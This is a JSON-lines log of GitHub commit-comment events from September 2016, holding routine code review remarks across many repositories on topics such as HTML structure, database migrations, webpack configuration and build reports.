{"id":"4556159640","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002998,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T14:59:49Z","updated_at":"2016-09-13T14:59:49Z","body":"There is some problem in closing the `<div>`, the squiggles and other sidebar items are being displayed below the accordion container panel. Fix it by either adding, removing or rearranging the divs, whichever is applicable.\r\n\r\nUse \"Inspect Element\" feature of the browser to easily check which element is inside which element."}},"created_at":"2016-09-13T14:59:49Z"}
{"id":"4556160981","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19003004,"position":39,"line":39,"path":"migrations/20160912132241_create_risks_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T15:00:03Z","updated_at":"2016-09-13T15:00:03Z","body":"Do you think we'll have more than those 3 values? If not, I think using a nullable `boolean` is better (`true == \"yes\"`, `false == \"no\"`, `null == \"unknown\"`)"}},"created_at":"2016-09-13T15:00:03Z"}
{"id":"4556165514","type":"CommitCommentEvent","actor":{"login":"ahmetcanaydemir"},"repo":{"name":"Ludeon/RimWorld-Turkish"},"payload":{"comment":{"id":19003015,"position":17,"line":10,"path":"Keyed/MainTabs.xml","commit_id":"ecf3d4337030d4d582043a99e4b606fd4737c493","created_at":"2016-09-13T15:00:36Z","updated_at":"2016-09-13T15:00:36Z","body":"Yanlış çeviri"}},"created_at":"2016-09-13T15:00:36Z"}
{"id":"4556165527","type":"CommitCommentEvent","actor":{"login":"adriandahlin"},"repo":{"name":"adriandahlin/PUI2016_akd361"},"payload":{"comment":{"id":19003016,"position":null,"line":null,"path":null,"commit_id":"557debe230a29e9a05643dc552398b7790dcbace","created_at":"2016-09-13T15:00:36Z","updated_at":"2016-09-13T15:00:36Z","body":"now including screenshot of alias in .bashrc in vi\r\n<img width=\"569\" alt=\"screenshot 2016-09-13 10 58 56\" src=\"https://cloud.githubusercontent.com/assets/21345429/18478982/40cf16e0-79a1-11e6-9dba-8914c8094426.png\">\r\n"}},"created_at":"2016-09-13T15:00:36Z"}
{"id":"4556166534","type":"CommitCommentEvent","actor":{"login":"pjmorse"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003017,"position":null,"line":null,"path":null,"commit_id":"db14d6a9d411bd5c7b38e87c8be5bea39e77c5d6","created_at":"2016-09-13T15:00:44Z","updated_at":"2016-09-13T15:00:44Z","body":"This is for the IDE?"}},"created_at":"2016-09-13T15:00:44Z"}
{"id":"4556168409","type":"CommitCommentEvent","actor":{"login":"pjmorse"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003021,"position":null,"line":null,"path":null,"commit_id":"68ab2579c800ada418928dd88017213d145fa631","created_at":"2016-09-13T15:01:01Z","updated_at":"2016-09-13T15:01:01Z","body":"👍 \r\n"}},"created_at":"2016-09-13T15:01:01Z"}
{"id":"4556168413","type":"CommitCommentEvent","actor":{"login":"hbrunn"},"repo":{"name":"OCA/OCB"},"payload":{"comment":{"id":19003020,"position":null,"line":null,"path":null,"commit_id":"a7dc3e17066274763d890d2b19bfa823091fdc0c","created_at":"2016-09-13T15:01:01Z","updated_at":"2016-09-13T15:01:01Z","body":"I would approve such a PR. Of course, I can't speak for the other devs, but I'd also fervently make the case that it's an improvement over the current situation. It would be better to find out what goes wrong and fix it, but given it's version n-2 for a deprecated module, I wouldn't see the point to enforce it"}},"created_at":"2016-09-13T15:01:01Z"}
{"id":"4556168834","type":"CommitCommentEvent","actor":{"login":"arscan"},"repo":{"name":"fhir-crucible/crucible"},"payload":{"comment":{"id":19003022,"position":null,"line":null,"path":null,"commit_id":"b1503920e6ff1159fffd4843a49a3cb2aee86885","created_at":"2016-09-13T15:01:05Z","updated_at":"2016-09-13T15:01:05Z","body":"Scratch that -- this was already fixed but my local machine was having issues due to caching issues.  Looks good."}},"created_at":"2016-09-13T15:01:05Z"}
{"id":"4556170336","type":"CommitCommentEvent","actor":{"login":"joshiggins"},"repo":{"name":"joshiggins/init8js"},"payload":{"comment":{"id":19003029,"position":null,"line":null,"path":null,"commit_id":"d05e74f620d354dc7c5a85cfc17579f71325c294","created_at":"2016-09-13T15:01:20Z","updated_at":"2016-09-13T15:01:20Z","body":"should the logging be a real module?"}},"created_at":"2016-09-13T15:01:20Z"}
{"id":"4556171410","type":"CommitCommentEvent","actor":{"login":"hashroot"},"repo":{"name":"Ferrari-Dev-Team/android_device_xiaomi_ferrari"},"payload":{"comment":{"id":19003033,"position":null,"line":null,"path":null,"commit_id":"b0424a779c7698073e185ab7f87ef2b39b4319da","created_at":"2016-09-13T15:01:30Z","updated_at":"2016-09-13T15:01:30Z","body":"booting?? pls share link of working build if any! @rohanpurohit "}},"created_at":"2016-09-13T15:01:30Z"}
{"id":"4556171436","type":"CommitCommentEvent","actor":{"login":"rmortan"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19003034,"position":null,"line":null,"path":null,"commit_id":"95b51201db8b052df9f2ab43b1daa3b397f42d24","created_at":"2016-09-13T15:01:30Z","updated_at":"2016-09-13T15:01:30Z","body":"GOT MY DIRECTION \r\nTARGET and EXECUTE time"}},"created_at":"2016-09-13T15:01:30Z"}
{"id":"4556172412","type":"CommitCommentEvent","actor":{"login":"benjamn"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":19003036,"position":null,"line":null,"path":null,"commit_id":"26d082b62ef6f6d92e80f69f18b6bede65bd7e98","created_at":"2016-09-13T15:01:36Z","updated_at":"2016-09-13T15:01:36Z","body":"@TimHeckel I mistakenly committed a bad `npm-shrinkwrap.json` file for the `promise` package, and tried republishing a couple of new versions before I realized what the problem really was: https://github.com/meteor/meteor/pull/7668/commits/ad61a935146c34e701b16ebc4262590143e8c702. You definitely want to use 0.8.7."}},"created_at":"2016-09-13T15:01:36Z"}
{"id":"4556173737","type":"CommitCommentEvent","actor":{"login":"somanole"},"repo":{"name":"OpenBankProject/OBP-API"},"payload":{"comment":{"id":19003041,"position":null,"line":null,"path":null,"commit_id":"f830e733f4274d571e4b92371ea548deae1b435c","created_at":"2016-09-13T15:01:49Z","updated_at":"2016-09-13T15:01:49Z","body":"@simonredfern getBranch is working fine, createBranch not giving any error back, validation comes back successful - something may be wrong with my local that I cannot figure out.\r\nCheers!"}},"created_at":"2016-09-13T15:01:49Z"}
{"id":"4556175209","type":"CommitCommentEvent","actor":{"login":"jheba"},"repo":{"name":"ezsystems/ezstudio-demo"},"payload":{"comment":{"id":19003046,"position":4,"line":8,"path":"app/config/env/docker.php","commit_id":"3290ef15c5d10df816e1ce51b607ab332c3ec4ad","created_at":"2016-09-13T15:02:00Z","updated_at":"2016-09-13T15:02:00Z","body":"@andrerom SDC uses `MYSQL_DATABASE` so testing against `DATABASE_HOST` is not correct. No env are loaded."}},"created_at":"2016-09-13T15:02:00Z"}
{"id":"4556175823","type":"CommitCommentEvent","actor":{"login":"ritesh-pandey"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19003052,"position":13,"line":335,"path":"lib/Cake/Cache/Engine/FileEngine.php","commit_id":"f5859ca7193dcd82433fb0f617d64b1fbd380801","created_at":"2016-09-13T15:02:06Z","updated_at":"2016-09-13T15:02:06Z","body":"@dereuromark Folders `./tmp/cache` and `./tmp/logs` are generated in dev mode. So IMHO they should be generated in prod mode as well. We have removed this `debug` check in 3.x"}},"created_at":"2016-09-13T15:02:06Z"}
{"id":"4556176302","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":19003053,"position":13,"line":31,"path":"package.json","commit_id":"5af7b0f33096986b6be5c9f42f0cefd2dd4424db","created_at":"2016-09-13T15:02:11Z","updated_at":"2016-09-13T15:02:11Z","body":"You'll want to update your `webpack.vendor.js` file to include these new dependencies:\r\n\r\n    entry: {\r\n      vendor: [\r\n        'react',\r\n        'react-dom'\r\n        'react-modal',\r\n        'react-redux',\r\n        'redux',\r\n        'redux-saga',\r\n      ]\r\n    },\r\n\r\nIt really depends on the browser, but if you're in need of the `fetch` polyfill you can also add it to your `webpack.config.js` entry (see: https://github.com/github/fetch#installation):\r\n\r\n  entry: ['babel-polyfill', 'whatwg-fetch', __dirname + '/ui/index.js'],"}},"created_at":"2016-09-13T15:02:11Z"}
{"id":"4556176786","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19003056,"position":18,"line":18,"path":"js/index.js","commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T15:02:15Z","updated_at":"2016-09-13T15:02:15Z","body":"These should be prepended with var, otherwise you create global variables which is very bad. "}},"created_at":"2016-09-13T15:02:15Z"}
{"id":"4556178094","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19003059,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T15:02:26Z","updated_at":"2016-09-13T15:02:26Z","body":"@drewpitchford I think this method is a good example of what you were talking about in your other comment. `originalSelector` is kind of redundant since the type is `Selector`. Here, `original` would be the role, so that gets left. Then to make it read fluently at the call site, the second argument might be better as `withNew`. The last argument's external name should then just be whatever preposition makes the most since (`for` is probably still the best choice here).\r\n\r\n```\r\nfunc swizzle(original originalSelector: Selector, withNew newSelector: Selector, for class: AnyClass)\r\n```\r\n\r\nI think it makes sense for the internal names to be `originalSelector` and `newSelector` so they're actually nouns.\r\n\r\nWhat do you think? I'm still getting the hang of it all."}},"created_at":"2016-09-13T15:02:26Z"}
{"id":"4556179501","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19003061,"position":48,"line":48,"path":"register.html","commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T15:02:38Z","updated_at":"2016-09-13T15:02:38Z","body":"Excellent use of fieldset and legend. "}},"created_at":"2016-09-13T15:02:38Z"}
{"id":"4556179564","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19003062,"position":35,"line":435,"path":"src/utils/polygon.cpp","commit_id":"baf8f49360099b22bb802a23465999cf952c6565","created_at":"2016-09-13T15:02:39Z","updated_at":"2016-09-13T15:02:39Z","body":"Would be nice to have some sort of documentation of what this do-while loop does. It removes duplicate vertices, I guess? Isn't that also implemented by Clipper?"}},"created_at":"2016-09-13T15:02:39Z"}
{"id":"4556179610","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":19003063,"position":3,"line":1,"path":"ui/actions.js","commit_id":"5af7b0f33096986b6be5c9f42f0cefd2dd4424db","created_at":"2016-09-13T15:02:39Z","updated_at":"2016-09-13T15:02:39Z","body":"Typically uppercase variables are reserved for class names, this should just be `types`."}},"created_at":"2016-09-13T15:02:39Z"}
{"id":"4556180783","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19003064,"position":59,"line":59,"path":"register.html","commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T15:02:50Z","updated_at":"2016-09-13T15:02:50Z","body":"dat vocab tho"}},"created_at":"2016-09-13T15:02:50Z"}
{"id":"4556181885","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19003068,"position":13,"line":335,"path":"lib/Cake/Cache/Engine/FileEngine.php","commit_id":"f5859ca7193dcd82433fb0f617d64b1fbd380801","created_at":"2016-09-13T15:02:59Z","updated_at":"2016-09-13T15:02:59Z","body":"No they should not, please refer to the docs or the support channels and don't hijack a 3 year old commit."}},"created_at":"2016-09-13T15:02:59Z"}
{"id":"4556182433","type":"CommitCommentEvent","actor":{"login":"cquiroz"},"repo":{"name":"gemini-hlsw/ocs"},"payload":{"comment":{"id":19003070,"position":34,"line":199,"path":"bundle/edu.gemini.lchquery.servlet/src/main/scala/edu/gemini/lchquery/servlet/LchQueryFunctor.scala","commit_id":"4bb03583fb47ed8639bb7cb9062829609acec21b","created_at":"2016-09-13T15:03:05Z","updated_at":"2016-09-13T15:03:05Z","body":"This looks right, and thread-safe 😄 "}},"created_at":"2016-09-13T15:03:05Z"}
{"id":"4556183328","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19003073,"position":33,"line":33,"path":"register.html","commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T15:03:14Z","updated_at":"2016-09-13T15:03:14Z","body":"Way to remember the action attribute!"}},"created_at":"2016-09-13T15:03:14Z"}
{"id":"4556183800","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19003075,"position":null,"line":null,"path":null,"commit_id":"bf78c8a72a6756be00a2b65865d498f61b67765f","created_at":"2016-09-13T15:03:18Z","updated_at":"2016-09-13T15:03:18Z","body":"Build report #159618415 for sha bf78c8a72a6756be00a2b65865d498f61b67765f:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1808%20/%208427%20%2821.45%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-13T15:03:18Z"}
{"id":"4556188977","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19003088,"position":null,"line":null,"path":null,"commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T15:04:02Z","updated_at":"2016-09-13T15:04:02Z","body":"Really great stuff. Your final form is marvelously styled and I'm impressed by the added validation. "}},"created_at":"2016-09-13T15:04:02Z"}
{"id":"4556189960","type":"CommitCommentEvent","actor":{"login":"cquiroz"},"repo":{"name":"gemini-hlsw/ocs"},"payload":{"comment":{"id":19003091,"position":23,"line":108,"path":"bundle/edu.gemini.lchquery.servlet/src/main/scala/edu/gemini/lchquery/servlet/LchQueryFunctor.scala","commit_id":"4bb03583fb47ed8639bb7cb9062829609acec21b","created_at":"2016-09-13T15:04:13Z","updated_at":"2016-09-13T15:04:13Z","body":"This looks fine to me too"}},"created_at":"2016-09-13T15:04:13Z"}
{"id":"4556193811","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19003098,"position":null,"line":null,"path":null,"commit_id":"3cee690a355cf3b9b32ee37579647bafc42061b1","created_at":"2016-09-13T15:04:47Z","updated_at":"2016-09-13T15:04:47Z","body":"@loosebazooka @etanshaul PTAL"}},"created_at":"2016-09-13T15:04:47Z"}
{"id":"4556196760","type":"CommitCommentEvent","actor":{"login":"sentsin"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":19003109,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-13T15:05:18Z","updated_at":"2016-09-13T15:05:18Z","body":"国庆后吧亲"}},"created_at":"2016-09-13T15:05:18Z"}
{"id":"4556198692","type":"CommitCommentEvent","actor":{"login":"sentsin"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":19003111,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-13T15:05:35Z","updated_at":"2016-09-13T15:05:35Z","body":"@error-code 国庆后吧亲"}},"created_at":"2016-09-13T15:05:35Z"}
{"id":"4556202229","type":"CommitCommentEvent","actor":{"login":"maggu2810"},"repo":{"name":"maggu2810/smarthome"},"payload":{"comment":{"id":19003119,"position":5,"line":230,"path":"extensions/ui/org.eclipse.smarthome.ui.paper/web-src/partials/control.html","commit_id":"862b1fbc1c9533e6471af99ca8f3c6c573cfaa9a","created_at":"2016-09-13T15:06:00Z","updated_at":"2016-09-13T15:06:00Z","body":"You are wrong.\r\n\r\n`!(isOptionList(item) && !isReadOnly(item))`\r\nis equal to\r\n`!isOptionList(item) || isReadOnly(item)`\r\n\r\nSo it is shown\r\n* for every item that is not an option list (the \"read only\" info don't care, then)\r\n* for every read only item\r\n"}},"created_at":"2016-09-13T15:06:00Z"}
{"id":"4556206178","type":"CommitCommentEvent","actor":{"login":"dmcassel"},"repo":{"name":"marklogic/RunDMC"},"payload":{"comment":{"id":19003129,"position":null,"line":null,"path":null,"commit_id":"2e326f030158c3d30e356a72f60dbb379d1014c3","created_at":"2016-09-13T15:06:36Z","updated_at":"2016-09-13T15:06:36Z","body":"@paxtonhare looks good to me"}},"created_at":"2016-09-13T15:06:36Z"}
{"id":"4556207437","type":"CommitCommentEvent","actor":{"login":"sainathpabba-thrymr"},"repo":{"name":"sainathpabba-thrymr/nikki"},"payload":{"comment":{"id":19003132,"position":null,"line":null,"path":null,"commit_id":"076b40913eb2427514402b9df9a65fc79e81060e","created_at":"2016-09-13T15:06:47Z","updated_at":"2016-09-13T15:06:47Z","body":"commit"}},"created_at":"2016-09-13T15:06:47Z"}
{"id":"4556207493","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":19003133,"position":16,"line":9,"path":"ui/omdbapi.js","commit_id":"5af7b0f33096986b6be5c9f42f0cefd2dd4424db","created_at":"2016-09-13T15:06:47Z","updated_at":"2016-09-13T15:06:47Z","body":"Oops, this is producing `http://www.omdbapi.com/?i={movieID}&plot=full&r=json`. You'll want to use backticks and `${variable}`:\r\n\r\n    return fetch(`http://www.omdbapi.com/?i=${movieID}&plot=full&r=json`);"}},"created_at":"2016-09-13T15:06:47Z"}
{"id":"4556208866","type":"CommitCommentEvent","actor":{"login":"JenifferGenoatto"},"repo":{"name":"JenifferGenoatto/Jogos"},"payload":{"comment":{"id":19003136,"position":25,"line":40,"path":"Poker/src/poker/componentes/Baralho.java","commit_id":"270078c8f7333b5e97061fee19894b30b43ffb1f","created_at":"2016-09-13T15:06:59Z","updated_at":"2016-09-13T15:06:59Z","body":"d"}},"created_at":"2016-09-13T15:06:59Z"}
{"id":"4556211674","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19003141,"position":null,"line":null,"path":null,"commit_id":"683b5f315c33370a8357809b5aeb35650a7a44ec","created_at":"2016-09-13T15:07:26Z","updated_at":"2016-09-13T15:07:26Z","body":"|`libraries/stdlib/src/kotlin/collections/AbstractMap.kt:67`|\n|---|\nIt's curious that these are requirements for `keys` and `values`, but not for `entries`.\nBut I'll change implementation to hold these collections."}},"created_at":"2016-09-13T15:07:26Z"}
{"id":"4556213363","type":"CommitCommentEvent","actor":{"login":"xuhshen"},"repo":{"name":"harry0519/nsnqt"},"payload":{"comment":{"id":19003143,"position":null,"line":null,"path":null,"commit_id":"b3ef86c0574b5581238f67592a85cd680ce6d4c4","created_at":"2016-09-13T15:07:41Z","updated_at":"2016-09-13T15:07:41Z","body":"seems I still has no permission to commit code "}},"created_at":"2016-09-13T15:07:41Z"}
{"id":"4556214656","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003147,"position":7,"line":238,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-13T15:07:53Z","updated_at":"2016-09-13T15:07:53Z","body":"Stray print. Not sure if that even works from QML. :)"}},"created_at":"2016-09-13T15:07:53Z"}
{"id":"4556215864","type":"CommitCommentEvent","actor":{"login":"DrCreo"},"repo":{"name":"NaamloosDT/DSharpPlus"},"payload":{"comment":{"id":19003152,"position":null,"line":null,"path":null,"commit_id":"10a4ec0322cc0e5056be10b446f7a8b072307d1e","created_at":"2016-09-13T15:08:04Z","updated_at":"2016-09-13T15:08:04Z","body":"Lit :+1:  :100: "}},"created_at":"2016-09-13T15:08:04Z"}
{"id":"4556217001","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19003159,"position":37,"line":37,"path":"api/models/risk_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T15:08:15Z","updated_at":"2016-09-13T15:08:15Z","body":"Avoid explicit key names when they're unecessary (e.g. `this.belongsTo('Trial', 'trial_id')`)"}},"created_at":"2016-09-13T15:08:15Z"}
{"id":"4556217615","type":"CommitCommentEvent","actor":{"login":"aufhebenhonest"},"repo":{"name":"aufhebenhonest/-"},"payload":{"comment":{"id":19003162,"position":1,"line":1,"path":"README.md","commit_id":"1954b4e995328cbd5c328e7262a226be660383ec","created_at":"2016-09-13T15:08:21Z","updated_at":"2016-09-13T15:08:21Z","body":"数值分析"}},"created_at":"2016-09-13T15:08:21Z"}
{"id":"4556219156","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19003166,"position":57,"line":57,"path":"final_LL/contact/contact.html","commit_id":"ede6ccf50676ac2255f669e7fee5e7b995207b05","created_at":"2016-09-13T15:08:34Z","updated_at":"2016-09-13T15:08:34Z","body":"The combination of ul and li is not doing you any favors in this context. It's best to stick to form elements like input, label, fieldset and legend to delineate your form. If those don't fit the bill you can always use divs. "}},"created_at":"2016-09-13T15:08:34Z"}
{"id":"4556219158","type":"CommitCommentEvent","actor":{"login":"KillianDavitt"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":19003167,"position":59,"line":0,"path":"classcloud.py","commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-13T15:08:34Z","updated_at":"2016-09-13T15:08:34Z","body":"@barischj Does this count as a reply.\r\n\r\nI had no idea why I was doing that, it is now fixed."}},"created_at":"2016-09-13T15:08:34Z"}
{"id":"4556219856","type":"CommitCommentEvent","actor":{"login":"beheh"},"repo":{"name":"HearthSim/HSReplay.net"},"payload":{"comment":{"id":19003168,"position":null,"line":null,"path":null,"commit_id":"ad98d08996dad65415edee8073b796377f70eed1","created_at":"2016-09-13T15:08:40Z","updated_at":"2016-09-13T15:08:40Z","body":"Descriptions are now broken on live."}},"created_at":"2016-09-13T15:08:40Z"}
{"id":"4556220582","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19003171,"position":38,"line":38,"path":"api/models/risk_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T15:08:47Z","updated_at":"2016-09-13T15:08:47Z","body":"Don't write those methods (i.e. `toJSONSummary`) unless we're using them (not sure if we are)"}},"created_at":"2016-09-13T15:08:47Z"}
{"id":"4556220916","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19003173,"position":null,"line":null,"path":null,"commit_id":"b7679c14d0486c8488b932cc6a9ca65b51601106","created_at":"2016-09-13T15:08:50Z","updated_at":"2016-09-13T15:08:50Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T15:08:50Z"}
{"id":"4556222159","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19003174,"position":13,"line":0,"path":"js/js.libraries/src/core/collections/AbstractMap.kt","commit_id":"fc89d6edd9d0ddc0fd035a47c62a060fb94a55d7","created_at":"2016-09-13T15:09:01Z","updated_at":"2016-09-13T15:09:01Z","body":"|`line 104`|\n|---|\nWill fix in the later branch, KOTLIN-CR-351"}},"created_at":"2016-09-13T15:09:01Z"}
{"id":"4556223206","type":"CommitCommentEvent","actor":{"login":"babak49"},"repo":{"name":"deseretdigital-ui/ddm-selecty"},"payload":{"comment":{"id":19003178,"position":13,"line":31,"path":"src/simple/stateless/suggestions/option-groups/group/index.js","commit_id":"66d8524d4dfea4105ef3a0fbb6b41c23b6abf6e1","created_at":"2016-09-13T15:09:12Z","updated_at":"2016-09-13T15:09:12Z","body":"We have flag for \"No results found\" but not for groups. Anyway, we haven't this functionality previously, so I decided that it's easier to remove that."}},"created_at":"2016-09-13T15:09:12Z"}
{"id":"4556223953","type":"CommitCommentEvent","actor":{"login":"edgarriba"},"repo":{"name":"tiny-dnn/tiny-dnn"},"payload":{"comment":{"id":19003179,"position":21,"line":88,"path":"tiny_dnn/core/kernels/fully_connected_grad_op.h","commit_id":"18d8658aa034828f9de186e936afc76d3ec14f1c","created_at":"2016-09-13T15:09:20Z","updated_at":"2016-09-13T15:09:20Z","body":"@nyanp I got the following error in this line\r\n\r\nerror: invalid initialization of non-const reference of type ‘tiny_dnn::tensor_t& {aka std::vector<std::vector<float, tiny_dnn::aligned_allocator<float, 64ul> > >&}’ from an rvalue of type ‘tiny_dnn::tensor_t {aka std::vector<std::vector<float, tiny_dnn::aligned_allocator<float, 64ul> > >}’\r\n"}},"created_at":"2016-09-13T15:09:20Z"}
{"id":"4556224589","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19003182,"position":45,"line":45,"path":"migrations/20160912132241_create_risks_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T15:09:26Z","updated_at":"2016-09-13T15:09:26Z","body":"Add timestamps to all tables (:+1: for using `table.timestamps(true, true)`)"}},"created_at":"2016-09-13T15:09:26Z"}
{"id":"4556225015","type":"CommitCommentEvent","actor":{"login":"inspektore"},"repo":{"name":"Macsch15/tdesktop"},"payload":{"comment":{"id":19003183,"position":null,"line":null,"path":null,"commit_id":"6cc36106d6d7d9d3182f94c2da1835473bccb44d","created_at":"2016-09-13T15:09:29Z","updated_at":"2016-09-13T15:09:29Z","body":"Zamiast link, stosowałem \"odnośnik\", musimy to jakoś zunifikować."}},"created_at":"2016-09-13T15:09:29Z"}
{"id":"4556225017","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19003184,"position":116,"line":116,"path":"final_LL/contact/contact.html","commit_id":"ede6ccf50676ac2255f669e7fee5e7b995207b05","created_at":"2016-09-13T15:09:29Z","updated_at":"2016-09-13T15:09:29Z","body":"This file is missing from your repository. "}},"created_at":"2016-09-13T15:09:29Z"}
{"id":"4556225675","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003187,"position":21,"line":64,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:09:36Z","updated_at":"2016-09-13T15:09:36Z","body":"filename is mymlauncher.jar as tested today. \r\n"}},"created_at":"2016-09-13T15:09:36Z"}
{"id":"4556226106","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19003188,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T15:09:39Z","updated_at":"2016-09-13T15:09:39Z","body":"I was checking the fork history to see if some fix was developed by others :)\r\n\r\nYeah that issue with ALSA..\r\ni encountered the same problem when trying to apply EQ on the audio output.\r\n\r\nI end up building a variant version of the HPlayer based on LibVLC instead of omxplayer for that specific project. It works actually pretty fine, but the libvlc compilation is really painfull so i did not take the time to release the code, but it is planned (for a long time now..)\r\n\r\nLibVLC is quite interesting since it supports more format and encoding, allows hw decoding (the painfull recompilation comes from that), output audio thru ALSA, allow multiple instance...\r\nbut it doesn't support OpenGL manipulation yet, so it would be a feature lost in HPlayer.\r\n\r\nI can send you the binary version of the player if you are interested in.\r\nIt can not be commanded by OSC but using standard input instead.\r\nTo allow OSC command you could use a little python (with pyliblo) script\r\nto act as OSC listener and write to the player stdin.\r\n\r\nBest Regards,\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-13T15:09:39Z"}
